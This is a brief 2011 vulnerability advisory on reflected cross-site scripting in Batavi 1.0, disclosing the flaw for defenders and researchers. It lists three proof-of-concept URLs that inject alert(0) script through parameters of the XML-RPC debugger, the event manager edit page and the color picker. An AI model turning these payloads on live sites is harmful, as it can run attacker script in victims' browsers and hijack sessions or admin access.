Batavi version 1.0 suffers from a reflective cross site scripting vulnerability.
a08f8fbbcd702d34c02dc4327ee8bceecdb86b5324dadd5f09a343df84e1dbbb
------------------------------------------------------------------------
Software................Batavi 1.0
Vulnerability...........Reflected Cross-site Scripting
Download................http://www.batavi.org/
Release Date............2/20/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in Batavi 1.0 can be
exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/batavi/ext/xmlrpc/debugger/controller.php?action=&altmethodpayload=';}alert(0);{//
http://localhost/batavi/admin/templates/pages/event_manager/edit.php?mID=%3C/script%3E%3Chtml%3E%3Cscript%3Ealert(0);%3C/script%3E%3C/html%3E
http://localhost/batavi/admin/ext/color_picker/default.php?store_root=%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C%2fscript%3E